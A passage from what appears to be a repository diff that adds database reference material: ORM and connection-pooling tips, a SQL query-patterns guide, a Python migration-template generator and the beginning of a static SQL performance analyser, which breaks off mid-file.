| **TypeORM** | `@ManyToOne(() => ..., { lazy: true })` | `relations: ['posts']` or `leftJoinAndSelect` |
| **SQLAlchemy** | Default `lazy='select'` | `joinedload()` or `selectinload()` |
**Rule of thumb:** If you access a relation inside a loop, you have an N+1 problem. Always load relations before the loop.
---
## Connection Pooling
### Prisma
```
# In .env or connection string
DATABASE_URL="postgresql://user:pass@host/db?connection_limit=20&pool_timeout=10"
```
### Drizzle (with node-postgres)
```typescript
import { Pool } from 'pg';
const pool = new Pool({ max: 20, idleTimeoutMillis: 30000, connectionTimeoutMillis: 5000 });
const db = drizzle(pool);
```
### TypeORM
```typescript
const dataSource = new DataSource({
type: 'postgres',
extra: { max: 20, idleTimeoutMillis: 30000 },
});
```
### SQLAlchemy
```python
from sqlalchemy import create_engine
engine = create_engine('postgresql://user:pass@host/db', pool_size=20, max_overflow=5, pool_timeout=30)
```
---
## Best Practices Summary
1. **Always use migrations** — never modify production schemas by hand
2. **Eager load relations** — prevent N+1 in every list/collection query
3. **Use transactions** — group related writes to maintain consistency
4. **Parameterize raw SQL** — never concatenate user input into queries
5. **Connection pooling** — configure pool size matching your workload
6. **Index foreign keys** — ORMs often skip this; add manually if needed
7. **Review generated SQL** — enable query logging in development to catch inefficiencies
8. **Type-safe queries** — leverage TypeScript/Python typing for compile-time checks
9. **Separate read/write models** — use views or read replicas for heavy reporting queries
10. **Test migrations both ways** — always verify that down migrations actually reverse up migrations

View File

@@ -0,0 +1,406 @@
# SQL Query Patterns Reference
Common query patterns for everyday database operations. All examples use PostgreSQL syntax with dialect notes where they differ.
---
## JOIN Patterns
### INNER JOIN — matching rows in both tables
```sql
SELECT u.name, o.id AS order_id, o.total
FROM users u
INNER JOIN orders o ON o.user_id = u.id
WHERE o.status = 'paid';
```
### LEFT JOIN — all rows from left, matching from right
```sql
SELECT u.name, COUNT(o.id) AS order_count
FROM users u
LEFT JOIN orders o ON o.user_id = u.id
GROUP BY u.id, u.name;
```
Returns users even if they have zero orders.
### Self JOIN — comparing rows within the same table
```sql
-- Find employees who earn more than their manager
SELECT e.name AS employee, m.name AS manager, e.salary, m.salary AS manager_salary
FROM employees e
JOIN employees m ON e.manager_id = m.id
WHERE e.salary > m.salary;
```
### CROSS JOIN — every combination (cartesian product)
```sql
-- Generate a calendar grid
SELECT d.date, s.shift_name
FROM dates d
CROSS JOIN shifts s;
```
Use intentionally. Accidental cartesian joins are a performance killer.
### LATERAL JOIN (PostgreSQL) — correlated subquery as a table
```sql
-- Top 3 orders per user
SELECT u.name, top_orders.*
FROM users u
CROSS JOIN LATERAL (
SELECT id, total FROM orders
WHERE user_id = u.id
ORDER BY total DESC LIMIT 3
) top_orders;
```
MySQL equivalent: use a subquery with `ROW_NUMBER()`.
---
## Common Table Expressions (CTEs)
### Basic CTE — readable subquery
```sql
WITH active_users AS (
SELECT id, name, email
FROM users
WHERE last_login > CURRENT_DATE - INTERVAL '30 days'
)
SELECT au.name, COUNT(o.id) AS recent_orders
FROM active_users au
JOIN orders o ON o.user_id = au.id
GROUP BY au.name;
```
### Multiple CTEs — chaining transformations
```sql
WITH monthly_revenue AS (
SELECT DATE_TRUNC('month', created_at) AS month, SUM(total) AS revenue
FROM orders WHERE status = 'paid'
GROUP BY 1
),
growth AS (
SELECT month, revenue,
LAG(revenue) OVER (ORDER BY month) AS prev_revenue,
ROUND((revenue - LAG(revenue) OVER (ORDER BY month)) / LAG(revenue) OVER (ORDER BY month) * 100, 1) AS growth_pct
FROM monthly_revenue
)
SELECT * FROM growth ORDER BY month;
```
### Recursive CTE — hierarchical data
```sql
-- Organization tree
WITH RECURSIVE org_tree AS (
-- Base case: top-level managers
SELECT id, name, manager_id, 0 AS depth
FROM employees WHERE manager_id IS NULL
UNION ALL
-- Recursive case: subordinates
SELECT e.id, e.name, e.manager_id, ot.depth + 1
FROM employees e
JOIN org_tree ot ON e.manager_id = ot.id
)
SELECT * FROM org_tree ORDER BY depth, name;
```
### Recursive CTE — path traversal
```sql
-- Category breadcrumb
WITH RECURSIVE breadcrumb AS (
SELECT id, name, parent_id, name::TEXT AS path
FROM categories WHERE id = 42
UNION ALL
SELECT c.id, c.name, c.parent_id, c.name || ' > ' || b.path
FROM categories c
JOIN breadcrumb b ON c.id = b.parent_id
)
SELECT path FROM breadcrumb WHERE parent_id IS NULL;
```
---
## Window Functions
### ROW_NUMBER — assign unique rank per partition
```sql
SELECT *, ROW_NUMBER() OVER (PARTITION BY department_id ORDER BY salary DESC) AS rank
FROM employees;
```
### RANK and DENSE_RANK — handle ties
```sql
-- RANK: 1, 2, 2, 4 (skips after tie)
-- DENSE_RANK: 1, 2, 2, 3 (no skip)
SELECT name, salary,
RANK() OVER (ORDER BY salary DESC) AS rank,
DENSE_RANK() OVER (ORDER BY salary DESC) AS dense_rank
FROM employees;
```
### Running total and moving average
```sql
SELECT date, amount,
SUM(amount) OVER (ORDER BY date) AS running_total,
AVG(amount) OVER (ORDER BY date ROWS BETWEEN 6 PRECEDING AND CURRENT ROW) AS moving_avg_7d
FROM daily_revenue;
```
### LAG / LEAD — access adjacent rows
```sql
SELECT date, revenue,
LAG(revenue, 1) OVER (ORDER BY date) AS prev_day,
revenue - LAG(revenue, 1) OVER (ORDER BY date) AS day_over_day_change
FROM daily_revenue;
```
### NTILE — divide into buckets
```sql
-- Split customers into quartiles by total spend
SELECT customer_id, total_spend,
NTILE(4) OVER (ORDER BY total_spend DESC) AS spend_quartile
FROM customer_summary;
```
### FIRST_VALUE / LAST_VALUE
```sql
SELECT department_id, name, salary,
FIRST_VALUE(name) OVER (PARTITION BY department_id ORDER BY salary DESC) AS highest_paid
FROM employees;
```
---
## Subquery Patterns
### EXISTS — correlated existence check
```sql
-- Users who have placed at least one order
SELECT u.* FROM users u
WHERE EXISTS (SELECT 1 FROM orders o WHERE o.user_id = u.id);
```
### NOT EXISTS — safer than NOT IN for NULLs
```sql
-- Users who have never ordered
SELECT u.* FROM users u
WHERE NOT EXISTS (SELECT 1 FROM orders o WHERE o.user_id = u.id);
```
### Scalar subquery — single value
```sql
SELECT name, salary,
salary - (SELECT AVG(salary) FROM employees) AS diff_from_avg
FROM employees;
```
### Derived table — subquery in FROM
```sql
SELECT dept, avg_salary
FROM (
SELECT department_id AS dept, AVG(salary) AS avg_salary
FROM employees GROUP BY department_id
) dept_avg
WHERE avg_salary > 100000;
```
---
## Aggregation Patterns
### GROUP BY with HAVING
```sql
-- Departments with more than 10 employees
SELECT department_id, COUNT(*) AS headcount, AVG(salary) AS avg_salary
FROM employees
GROUP BY department_id
HAVING COUNT(*) > 10;
```
### GROUPING SETS — multiple grouping levels
```sql
SELECT region, product_category, SUM(revenue)
FROM sales
GROUP BY GROUPING SETS (
(region, product_category),
(region),
(product_category),
()
);
```
### ROLLUP — hierarchical subtotals
```sql
SELECT region, city, SUM(revenue)
FROM sales
GROUP BY ROLLUP (region, city);
-- Produces: (region, city), (region), ()
```
### CUBE — all combinations
```sql
SELECT region, product, SUM(revenue)
FROM sales
GROUP BY CUBE (region, product);
```
### FILTER clause (PostgreSQL) — conditional aggregation
```sql
SELECT
COUNT(*) AS total,
COUNT(*) FILTER (WHERE status = 'paid') AS paid,
COUNT(*) FILTER (WHERE status = 'cancelled') AS cancelled,
SUM(total) FILTER (WHERE status = 'paid') AS paid_revenue
FROM orders;
```
MySQL/SQL Server equivalent: `SUM(CASE WHEN status = 'paid' THEN 1 ELSE 0 END)`.
---
## UPSERT Patterns
### PostgreSQL — ON CONFLICT
```sql
INSERT INTO user_settings (user_id, key, value, updated_at)
VALUES (1, 'theme', 'dark', NOW())
ON CONFLICT (user_id, key)
DO UPDATE SET value = EXCLUDED.value, updated_at = EXCLUDED.updated_at;
```
### MySQL — ON DUPLICATE KEY
```sql
INSERT INTO user_settings (user_id, key_name, value, updated_at)
VALUES (1, 'theme', 'dark', NOW())
ON DUPLICATE KEY UPDATE value = VALUES(value), updated_at = VALUES(updated_at);
```
### SQL Server — MERGE
```sql
MERGE INTO user_settings AS target
USING (VALUES (1, 'theme', 'dark')) AS source (user_id, key_name, value)
ON target.user_id = source.user_id AND target.key_name = source.key_name
WHEN MATCHED THEN UPDATE SET value = source.value, updated_at = GETDATE()
WHEN NOT MATCHED THEN INSERT (user_id, key_name, value, updated_at)
VALUES (source.user_id, source.key_name, source.value, GETDATE());
```
---
## JSON Operations
### PostgreSQL JSONB
```sql
-- Extract field
SELECT data->>'name' AS name FROM products WHERE data->>'category' = 'electronics';
-- Array contains
SELECT * FROM products WHERE data->'tags' ? 'sale';
-- Update nested field
UPDATE products SET data = jsonb_set(data, '{price}', '29.99') WHERE id = 1;
-- Aggregate into JSON array
SELECT jsonb_agg(jsonb_build_object('id', id, 'name', name)) FROM users;
```
### MySQL JSON
```sql
-- Extract field
SELECT JSON_EXTRACT(data, '$.name') AS name FROM products;
-- Shorthand: SELECT data->>"$.name"
-- Search in array
SELECT * FROM products WHERE JSON_CONTAINS(data->"$.tags", '"sale"');
-- Update
UPDATE products SET data = JSON_SET(data, '$.price', 29.99) WHERE id = 1;
```
---
## Pagination Patterns
### Offset pagination (simple but slow for deep pages)
```sql
SELECT * FROM products ORDER BY id LIMIT 20 OFFSET 40;
```
### Keyset pagination (fast, requires ordered unique column)
```sql
-- Page after the last seen id
SELECT * FROM products WHERE id > :last_seen_id ORDER BY id LIMIT 20;
```
### Keyset with composite sort
```sql
SELECT * FROM products
WHERE (created_at, id) < (:last_created_at, :last_id)
ORDER BY created_at DESC, id DESC
LIMIT 20;
```
---
## Bulk Operations
### Batch INSERT
```sql
INSERT INTO events (type, payload, created_at) VALUES
('click', '{"page": "/home"}', NOW()),
('view', '{"page": "/pricing"}', NOW()),
('click', '{"page": "/signup"}', NOW());
```
### Batch UPDATE with VALUES
```sql
UPDATE products AS p SET price = v.price
FROM (VALUES (1, 29.99), (2, 49.99), (3, 9.99)) AS v(id, price)
WHERE p.id = v.id;
```
### DELETE with subquery
```sql
DELETE FROM sessions
WHERE user_id IN (SELECT id FROM users WHERE deleted_at IS NOT NULL);
```
### COPY (PostgreSQL bulk load)
```sql
COPY products (name, price, category) FROM '/path/to/data.csv' WITH (FORMAT csv, HEADER true);
```
---
## Utility Patterns
### Generate series (PostgreSQL)
```sql
-- Fill date gaps
SELECT d::date FROM generate_series('2025-01-01'::date, '2025-12-31', '1 day') d;
```
### Deduplicate rows
```sql
DELETE FROM events a USING events b
WHERE a.id > b.id AND a.user_id = b.user_id AND a.event_type = b.event_type
AND a.created_at = b.created_at;
```
### Pivot (manual)
```sql
SELECT user_id,
SUM(CASE WHEN month = 1 THEN revenue END) AS jan,
SUM(CASE WHEN month = 2 THEN revenue END) AS feb,
SUM(CASE WHEN month = 3 THEN revenue END) AS mar
FROM monthly_revenue
GROUP BY user_id;
```
### Conditional INSERT (skip if exists)
```sql
INSERT INTO tags (name) SELECT 'new-tag'
WHERE NOT EXISTS (SELECT 1 FROM tags WHERE name = 'new-tag');
```

View File

@@ -0,0 +1,442 @@
#!/usr/bin/env python3
"""
Migration Generator
Generates database migration file templates (up/down) from natural-language
schema change descriptions.
Supported operations:
- Add column, drop column, rename column
- Add table, drop table, rename table
- Add index, drop index
- Add constraint, drop constraint
- Change column type
Usage:
python migration_generator.py --change "add email_verified boolean to users" --dialect postgres
python migration_generator.py --change "rename column name to full_name in customers" --format alembic
python migration_generator.py --change "add index on orders(status, created_at)" --output 001_add_index.sql
python migration_generator.py --change "create table reviews with id, user_id, rating, body" --json
"""
import argparse
import json
import os
import re
import sys
import textwrap
from dataclasses import dataclass, asdict
from datetime import datetime
from typing import List, Optional, Tuple
@dataclass
class Migration:
"""A generated migration with up and down scripts."""
description: str
dialect: str
format: str
up: str
down: str
warnings: List[str]
def to_dict(self):
return asdict(self)
# ---------------------------------------------------------------------------
# Change parsers — extract structured intent from natural language
# ---------------------------------------------------------------------------
def parse_add_column(desc: str) -> Optional[dict]:
"""Parse: add <column> <type> to <table>"""
m = re.match(
r'add\s+(?:column\s+)?(\w+)\s+(\w[\w(),.]*)\s+(?:to|on)\s+(\w+)',
desc, re.IGNORECASE,
)
if m:
return {"op": "add_column", "column": m.group(1), "type": m.group(2), "table": m.group(3)}
return None
def parse_drop_column(desc: str) -> Optional[dict]:
"""Parse: drop/remove <column> from <table>"""
m = re.match(
r'(?:drop|remove)\s+(?:column\s+)?(\w+)\s+from\s+(\w+)',
desc, re.IGNORECASE,
)
if m:
return {"op": "drop_column", "column": m.group(1), "table": m.group(2)}
return None
def parse_rename_column(desc: str) -> Optional[dict]:
"""Parse: rename column <old> to <new> in <table>"""
m = re.match(
r'rename\s+column\s+(\w+)\s+to\s+(\w+)\s+in\s+(\w+)',
desc, re.IGNORECASE,
)
if m:
return {"op": "rename_column", "old": m.group(1), "new": m.group(2), "table": m.group(3)}
return None
def parse_add_table(desc: str) -> Optional[dict]:
"""Parse: create table <name> with <col1>, <col2>, ..."""
m = re.match(
r'create\s+table\s+(\w+)\s+with\s+(.+)',
desc, re.IGNORECASE,
)
if m:
cols = [c.strip() for c in m.group(2).split(",")]
return {"op": "add_table", "table": m.group(1), "columns": cols}
return None
def parse_drop_table(desc: str) -> Optional[dict]:
"""Parse: drop table <name>"""
m = re.match(r'drop\s+table\s+(\w+)', desc, re.IGNORECASE)
if m:
return {"op": "drop_table", "table": m.group(1)}
return None
def parse_add_index(desc: str) -> Optional[dict]:
"""Parse: add index on <table>(<col1>, <col2>)"""
m = re.match(
r'add\s+(?:unique\s+)?index\s+(?:on\s+)?(\w+)\s*\(([^)]+)\)',
desc, re.IGNORECASE,
)
if m:
unique = "unique" in desc.lower()
cols = [c.strip() for c in m.group(2).split(",")]
return {"op": "add_index", "table": m.group(1), "columns": cols, "unique": unique}
return None
def parse_change_type(desc: str) -> Optional[dict]:
"""Parse: change <column> type to <type> in <table>"""
m = re.match(
r'change\s+(?:column\s+)?(\w+)\s+type\s+to\s+(\w[\w(),.]*)\s+in\s+(\w+)',
desc, re.IGNORECASE,
)
if m:
return {"op": "change_type", "column": m.group(1), "new_type": m.group(2), "table": m.group(3)}
return None
PARSERS = [
parse_add_column,
parse_drop_column,
parse_rename_column,
parse_add_table,
parse_drop_table,
parse_add_index,
parse_change_type,
]
def parse_change(desc: str) -> Optional[dict]:
for parser in PARSERS:
result = parser(desc)
if result:
return result
return None
# ---------------------------------------------------------------------------
# SQL generators per dialect
# ---------------------------------------------------------------------------
TYPE_MAP = {
"boolean": {"postgres": "BOOLEAN", "mysql": "TINYINT(1)", "sqlite": "INTEGER", "sqlserver": "BIT"},
"text": {"postgres": "TEXT", "mysql": "TEXT", "sqlite": "TEXT", "sqlserver": "NVARCHAR(MAX)"},
"integer": {"postgres": "INTEGER", "mysql": "INT", "sqlite": "INTEGER", "sqlserver": "INT"},
"int": {"postgres": "INTEGER", "mysql": "INT", "sqlite": "INTEGER", "sqlserver": "INT"},
"serial": {"postgres": "SERIAL", "mysql": "INT AUTO_INCREMENT", "sqlite": "INTEGER", "sqlserver": "INT IDENTITY(1,1)"},
"varchar": {"postgres": "VARCHAR(255)", "mysql": "VARCHAR(255)", "sqlite": "TEXT", "sqlserver": "NVARCHAR(255)"},
"timestamp": {"postgres": "TIMESTAMP", "mysql": "DATETIME", "sqlite": "TEXT", "sqlserver": "DATETIME2"},
"uuid": {"postgres": "UUID", "mysql": "CHAR(36)", "sqlite": "TEXT", "sqlserver": "UNIQUEIDENTIFIER"},
"json": {"postgres": "JSONB", "mysql": "JSON", "sqlite": "TEXT", "sqlserver": "NVARCHAR(MAX)"},
"decimal": {"postgres": "DECIMAL(19,4)", "mysql": "DECIMAL(19,4)", "sqlite": "REAL", "sqlserver": "DECIMAL(19,4)"},
"float": {"postgres": "DOUBLE PRECISION", "mysql": "DOUBLE", "sqlite": "REAL", "sqlserver": "FLOAT"},
}
def map_type(type_name: str, dialect: str) -> str:
"""Map a generic type name to a dialect-specific type."""
key = type_name.lower().rstrip("()")
if key in TYPE_MAP and dialect in TYPE_MAP[key]:
return TYPE_MAP[key][dialect]
return type_name.upper()
def gen_add_column(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
col_type = map_type(change["type"], dialect)
table = change["table"]
col = change["column"]
up = f"ALTER TABLE {table} ADD COLUMN {col} {col_type};"
down = f"ALTER TABLE {table} DROP COLUMN {col};"
return up, down, []
def gen_drop_column(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
table = change["table"]
col = change["column"]
up = f"ALTER TABLE {table} DROP COLUMN {col};"
down = f"-- WARNING: Cannot fully reverse DROP COLUMN. Provide the original type.\nALTER TABLE {table} ADD COLUMN {col} TEXT;"
return up, down, ["Down migration uses TEXT as placeholder. Replace with the original column type."]
def gen_rename_column(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
table = change["table"]
old, new = change["old"], change["new"]
warnings = []
if dialect == "postgres":
up = f"ALTER TABLE {table} RENAME COLUMN {old} TO {new};"
down = f"ALTER TABLE {table} RENAME COLUMN {new} TO {old};"
elif dialect == "mysql":
up = f"ALTER TABLE {table} RENAME COLUMN {old} TO {new};"
down = f"ALTER TABLE {table} RENAME COLUMN {new} TO {old};"
elif dialect == "sqlite":
up = f"ALTER TABLE {table} RENAME COLUMN {old} TO {new};"
down = f"ALTER TABLE {table} RENAME COLUMN {new} TO {old};"
warnings.append("SQLite RENAME COLUMN requires version 3.25.0+.")
elif dialect == "sqlserver":
up = f"EXEC sp_rename '{table}.{old}', '{new}', 'COLUMN';"
down = f"EXEC sp_rename '{table}.{new}', '{old}', 'COLUMN';"
else:
up = f"ALTER TABLE {table} RENAME COLUMN {old} TO {new};"
down = f"ALTER TABLE {table} RENAME COLUMN {new} TO {old};"
return up, down, warnings
def gen_add_table(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
table = change["table"]
cols = change["columns"]
col_defs = []
has_id = False
for col in cols:
col = col.strip()
if col.lower() == "id":
has_id = True
if dialect == "postgres":
col_defs.append(" id SERIAL PRIMARY KEY")
elif dialect == "mysql":
col_defs.append(" id INT AUTO_INCREMENT PRIMARY KEY")
elif dialect == "sqlite":
col_defs.append(" id INTEGER PRIMARY KEY AUTOINCREMENT")
elif dialect == "sqlserver":
col_defs.append(" id INT IDENTITY(1,1) PRIMARY KEY")
else:
# Check if type is specified (e.g., "rating int")
parts = col.split()
if len(parts) >= 2:
col_defs.append(f" {parts[0]} {map_type(parts[1], dialect)}")
else:
col_defs.append(f" {col} TEXT")
cols_sql = ",\n".join(col_defs)
up = f"CREATE TABLE {table} (\n{cols_sql}\n);"
down = f"DROP TABLE {table};"
warnings = []
if not has_id:
warnings.append("Table has no explicit primary key. Consider adding an 'id' column.")
return up, down, warnings
def gen_drop_table(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
table = change["table"]
up = f"DROP TABLE {table};"
down = f"-- WARNING: Cannot reverse DROP TABLE without original DDL.\nCREATE TABLE {table} (id INTEGER PRIMARY KEY);"
return up, down, ["Down migration is a placeholder. Replace with the original CREATE TABLE statement."]
def gen_add_index(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
table = change["table"]
cols = change["columns"]
unique = "UNIQUE " if change.get("unique") else ""
idx_name = f"idx_{table}_{'_'.join(cols)}"
if dialect == "postgres":
up = f"CREATE {unique}INDEX CONCURRENTLY {idx_name} ON {table} ({', '.join(cols)});"
else:
up = f"CREATE {unique}INDEX {idx_name} ON {table} ({', '.join(cols)});"
down = f"DROP INDEX {idx_name};" if dialect != "mysql" else f"DROP INDEX {idx_name} ON {table};"
warnings = []
if dialect == "postgres":
warnings.append("CONCURRENTLY cannot run inside a transaction. Run outside migration transaction.")
return up, down, warnings
def gen_change_type(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
table = change["table"]
col = change["column"]
new_type = map_type(change["new_type"], dialect)
warnings = ["Down migration uses TEXT as placeholder. Replace with the original column type."]
if dialect == "postgres":
up = f"ALTER TABLE {table} ALTER COLUMN {col} TYPE {new_type};"
down = f"ALTER TABLE {table} ALTER COLUMN {col} TYPE TEXT;"
elif dialect == "mysql":
up = f"ALTER TABLE {table} MODIFY COLUMN {col} {new_type};"
down = f"ALTER TABLE {table} MODIFY COLUMN {col} TEXT;"
elif dialect == "sqlserver":
up = f"ALTER TABLE {table} ALTER COLUMN {col} {new_type};"
down = f"ALTER TABLE {table} ALTER COLUMN {col} NVARCHAR(MAX);"
else:
up = f"-- SQLite does not support ALTER COLUMN. Recreate the table."
down = f"-- SQLite does not support ALTER COLUMN. Recreate the table."
warnings.append("SQLite requires table recreation for type changes.")
return up, down, warnings
GENERATORS = {
"add_column": gen_add_column,
"drop_column": gen_drop_column,
"rename_column": gen_rename_column,
"add_table": gen_add_table,
"drop_table": gen_drop_table,
"add_index": gen_add_index,
"change_type": gen_change_type,
}
# ---------------------------------------------------------------------------
# Format wrappers
# ---------------------------------------------------------------------------
def wrap_sql(up: str, down: str, description: str) -> Tuple[str, str]:
"""Wrap as plain SQL migration files."""
timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
header = f"-- Migration: {description}\n-- Generated: {datetime.now().isoformat()}\n\n"
return header + "-- Up\n" + up, header + "-- Down\n" + down
def wrap_prisma(up: str, down: str, description: str) -> Tuple[str, str]:
"""Format as Prisma migration SQL (Prisma uses raw SQL in migration.sql)."""
header = f"-- Migration: {description}\n-- Format: Prisma (migration.sql)\n\n"
return header + up, header + "-- Rollback\n" + down
def wrap_alembic(up: str, down: str, description: str) -> Tuple[str, str]:
"""Format as Alembic Python migration."""
slug = re.sub(r'\W+', '_', description.lower())[:40]
revision = datetime.now().strftime("%Y%m%d%H%M")
template = textwrap.dedent(f'''\
"""
{description}
Revision ID: {revision}
"""
from alembic import op
import sqlalchemy as sa
revision = '{revision}'
down_revision = None # Set to previous revision
def upgrade():
op.execute("""
{textwrap.indent(up, " ")}
""")
def downgrade():
op.execute("""
{textwrap.indent(down, " ")}
""")
''')
return template, ""
FORMATTERS = {
"sql": wrap_sql,
"prisma": wrap_prisma,
"alembic": wrap_alembic,
}
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(
description="Generate database migration templates from change descriptions.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Supported change descriptions:
"add email_verified boolean to users"
"drop column legacy_flag from accounts"
"rename column name to full_name in customers"
"create table reviews with id, user_id, rating int, body text"
"drop table temp_imports"
"add index on orders(status, created_at)"
"add unique index on users(email)"
"change email type to varchar in users"
Examples:
%(prog)s --change "add phone varchar to users" --dialect postgres
%(prog)s --change "create table reviews with id, user_id, rating int, body" --format prisma
%(prog)s --change "add index on orders(status)" --output migrations/001.sql --json
""",
)
parser.add_argument("--change", required=True, help="Natural-language description of the schema change")
parser.add_argument("--dialect", choices=["postgres", "mysql", "sqlite", "sqlserver"],
default="postgres", help="Target database dialect (default: postgres)")
parser.add_argument("--format", choices=["sql", "prisma", "alembic"], default="sql",
dest="fmt", help="Output format (default: sql)")
parser.add_argument("--output", help="Write migration to file instead of stdout")
parser.add_argument("--json", action="store_true", dest="json_output", help="Output as JSON")
args = parser.parse_args()
change = parse_change(args.change)
if not change:
print(f"Error: Could not parse change description: '{args.change}'", file=sys.stderr)
print("Run with --help to see supported patterns.", file=sys.stderr)
sys.exit(1)
gen_fn = GENERATORS.get(change["op"])
if not gen_fn:
print(f"Error: No generator for operation '{change['op']}'", file=sys.stderr)
sys.exit(1)
up, down, warnings = gen_fn(change, args.dialect)
fmt_fn = FORMATTERS[args.fmt]
up_formatted, down_formatted = fmt_fn(up, down, args.change)
migration = Migration(
description=args.change,
dialect=args.dialect,
format=args.fmt,
up=up_formatted,
down=down_formatted,
warnings=warnings,
)
if args.json_output:
print(json.dumps(migration.to_dict(), indent=2))
else:
if args.output:
with open(args.output, "w") as f:
f.write(migration.up)
print(f"Migration written to {args.output}")
if migration.down:
down_path = args.output.replace(".sql", "_down.sql")
with open(down_path, "w") as f:
f.write(migration.down)
print(f"Rollback written to {down_path}")
else:
print(migration.up)
if migration.down:
print("\n" + "=" * 40 + " ROLLBACK " + "=" * 40 + "\n")
print(migration.down)
if warnings:
print("\nWarnings:")
for w in warnings:
print(f" - {w}")
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,348 @@
#!/usr/bin/env python3
"""
SQL Query Optimizer — Static Analysis
Analyzes SQL queries for common performance issues:
- SELECT * usage
- Missing WHERE clauses on UPDATE/DELETE
- Cartesian joins (missing JOIN conditions)
- Subqueries in SELECT list
- Missing LIMIT on unbounded SELECTs
- Function calls on indexed columns (non-sargable)
- LIKE with leading wildcard
- ORDER BY RAND()
- UNION instead of UNION ALL
- NOT IN with subquery (NULL-unsafe)
Usage:
python query_optimizer.py --query "SELECT * FROM users"
python query_optimizer.py --query queries.sql --dialect postgres
python query_optimizer.py --query "SELECT * FROM orders" --json
"""
import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict
from typing import List, Optional
@dataclass
class Issue:
"""A single optimization issue found in a query."""
severity: str # critical, warning, info
rule: str
message: str
suggestion: str
line: Optional[int] = None
@dataclass
class QueryAnalysis:
"""Analysis result for one SQL query."""
query: str
issues: List[Issue]
score: int # 0-100, higher is better
def to_dict(self):
return {
"query": self.query[:200] + ("..." if len(self.query) > 200 else ""),
"issues": [asdict(i) for i in self.issues],
"issue_count": len(self.issues),
"score": self.score,
}
# ---------------------------------------------------------------------------
# Rule checkers
# ---------------------------------------------------------------------------
def check_select_star(sql: str) -> Optional[Issue]:
"""Detect SELECT * usage."""
if re.search(r'\bSELECT\s+\*\s', sql, re.IGNORECASE):
return Issue(
severity="warning",
rule="select-star",
message="SELECT * transfers unnecessary data and breaks on schema changes.",
suggestion="List only the columns you need: SELECT col1, col2, ...",
)
return None
def check_missing_where(sql: str) -> Optional[Issue]:
"""Detect UPDATE/DELETE without WHERE."""
upper = sql.upper().strip()
for keyword in ("UPDATE", "DELETE"):
if upper.startswith(keyword) and "WHERE" not in upper:
return Issue(
severity="critical",
rule="missing-where",
message=f"{keyword} without WHERE affects every row in the table.",
suggestion=f"Add a WHERE clause to restrict the {keyword} scope.",
)
return None
def check_cartesian_join(sql: str) -> Optional[Issue]:
"""Detect comma-separated tables without explicit JOIN or WHERE join condition."""
upper = sql.upper()
if "SELECT" not in upper:
return None
from_match = re.search(r'\bFROM\s+(.+?)(?:\bWHERE\b|\bGROUP\b|\bORDER\b|\bLIMIT\b|\bHAVING\b|;|$)',
sql, re.IGNORECASE | re.DOTALL)
if not from_match:
return None
from_clause = from_match.group(1)
# Skip if explicit JOINs are used
if re.search(r'\bJOIN\b', from_clause, re.IGNORECASE):
return None
# Count comma-separated tables
tables = [t.strip() for t in from_clause.split(",") if t.strip()]
if len(tables) > 1 and "WHERE" not in upper:
return Issue(
severity="critical",
rule="cartesian-join",
message="Multiple tables in FROM without JOIN or WHERE creates a cartesian product.",
suggestion="Use explicit JOIN syntax with ON conditions.",
)
return None
def check_subquery_in_select(sql: str) -> Optional[Issue]:
"""Detect correlated subqueries in SELECT list."""
select_match = re.search(r'\bSELECT\b(.+?)\bFROM\b', sql, re.IGNORECASE | re.DOTALL)
if select_match:
select_clause = select_match.group(1)
if re.search(r'\(\s*SELECT\b', select_clause, re.IGNORECASE):
return Issue(
severity="warning",
rule="subquery-in-select",
message="Subquery in SELECT list executes once per row (correlated subquery).",
suggestion="Rewrite as a LEFT JOIN with aggregation.",
)
return None
def check_missing_limit(sql: str) -> Optional[Issue]:
"""Detect unbounded SELECT without LIMIT."""
upper = sql.upper().strip()
if not upper.startswith("SELECT"):
return None
# Skip if it's a subquery or aggregate-only
if re.search(r'\bCOUNT\s*\(', upper) and "GROUP BY" not in upper:
return None
if "LIMIT" not in upper and "FETCH" not in upper and "TOP " not in upper:
return Issue(
severity="info",
rule="missing-limit",
message="SELECT without LIMIT may return unbounded rows.",
suggestion="Add LIMIT to prevent returning excessive data.",
)
return None
def check_function_on_column(sql: str) -> Optional[Issue]:
"""Detect function calls on columns in WHERE (non-sargable)."""
where_match = re.search(r'\bWHERE\b(.+?)(?:\bGROUP\b|\bORDER\b|\bLIMIT\b|\bHAVING\b|;|$)',
sql, re.IGNORECASE | re.DOTALL)
if not where_match:
return None
where_clause = where_match.group(1)
non_sargable = re.search(
r'\b(YEAR|MONTH|DAY|DATE|UPPER|LOWER|TRIM|CAST|COALESCE|IFNULL|NVL)\s*\(',
where_clause, re.IGNORECASE
)
if non_sargable:
func = non_sargable.group(1).upper()
return Issue(
severity="warning",
rule="non-sargable",
message=f"Function {func}() on column in WHERE prevents index usage.",
suggestion="Rewrite to compare the raw column against transformed constants.",
)
return None
def check_leading_wildcard(sql: str) -> Optional[Issue]:
"""Detect LIKE '%...' patterns."""
if re.search(r"LIKE\s+'%", sql, re.IGNORECASE):
return Issue(
severity="warning",
rule="leading-wildcard",
message="LIKE with leading wildcard prevents index usage.",
suggestion="Use full-text search (GIN index, FULLTEXT, FTS5) for substring matching.",
)
return None
def check_order_by_rand(sql: str) -> Optional[Issue]:
"""Detect ORDER BY RAND() / RANDOM()."""
if re.search(r'ORDER\s+BY\s+(RAND|RANDOM)\s*\(\)', sql, re.IGNORECASE):
return Issue(
severity="warning",
rule="order-by-rand",
message="ORDER BY RAND() scans and sorts the entire table.",
suggestion="Use application-side random sampling or TABLESAMPLE.",
)
return None
def check_union_vs_union_all(sql: str) -> Optional[Issue]:
"""Detect UNION without ALL (unnecessary dedup)."""
if re.search(r'\bUNION\b(?!\s+ALL\b)', sql, re.IGNORECASE):
return Issue(
severity="info",
rule="union-without-all",
message="UNION performs deduplication sort; use UNION ALL if duplicates are acceptable.",
suggestion="Replace UNION with UNION ALL unless you specifically need deduplication.",
)
return None
def check_not_in_subquery(sql: str) -> Optional[Issue]:
